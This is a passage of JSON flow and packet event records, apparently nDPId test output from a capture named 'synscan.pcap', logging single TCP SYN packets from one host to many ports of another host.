+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAshOQAACUGno6sEAAIQA2GNIzTJMfdU4MZAAAAAGACCAALxQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsIo8AADgG7eOsEAAIQA2GNIzTEB7dU4MZAAAAAGACBAAkbgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsVrUAAC0GxL2sEAAIQA2GNIzT4cXdU4MZAAAAAGACCABOxgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsDQ4AADkGAmWsEAAIQA2GNIzTGMrdU4MZAAAAAGACCAAXwgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAse1MAACYGpx+sEAAIQA2GNIzTCvDdU4MZAAAAAGACDAAhnAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAscl4AACwGqhSsEAAIQA2GNIzTEjbdU4MZAAAAAGACBAAiVgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsjp0AADcGgtWsEAAIQA2GNIzTHj3dU4MZAAAAAGACEAAKTwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsTWIAAC8GzBCsEAAIQA2GNIzTAtbdU4MZAAAAAGACEAAltgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsNuUAACUG7I2sEAAIQA2GNIzTA5DdU4MZAAAAAGACCAAs\/AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsRV0AACwG1xWsEAAIQA2GNIzTPX7dU4MZAAAAAGACBAD3DQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAs1DsAADUGPzesEAAIQA2GNIzTZIbdU4MZAAAAAGACCADMBQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAshVsAADgGixesEAAIQA2GNIzTBw3dU4MZAAAAAGACBAAtfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs1uMAACsGRo+sEAAIQA2GNIzTIcvdU4MZAAAAAGACEAAGwQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsgrAAADsGisKsEAAIQA2GNIzSAobdUoMYAAAAAGACEAAmCQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs298AADUGN5OsEAAIQA2GNIzSK2fdUoMYAAAAAGACCAAFKAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsMQEAACkG7nGsEAAIQA2GNIzSJtjdUoMYAAAAAGACCAAJtwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs4TUAACcGQD2sEAAIQA2GNIzSB0bdUoMYAAAAAGACEAAhSQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAssXUAADAGZv2sEAAIQA2GNIzSH6TdUoMYAAAAAGACBAAU6wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAscLcAACsGrLusEAAIQA2GNIzSHufdUoMYAAAAAGACEAAJqAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsNTUAADcG3D2sEAAIQA2GNIzSgAzdUoMYAAAAAGACEACoggAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/0EAADAGGTGsEAAIQA2GNIzSAKPdUoMYAAAAAGACBAAz7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsMqQAACwG6c6sEAAIQA2GNIzSDOXdUoMYAAAAAGACBAAnqgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsm\/MAACcGhX+sEAAIQA2GNIzSCJjdUoMYAAAAAGACEAAf9wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAspNsAADoGaZesEAAIQA2GNIzSG57dUoMYAAAAAGACDAAQ8QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 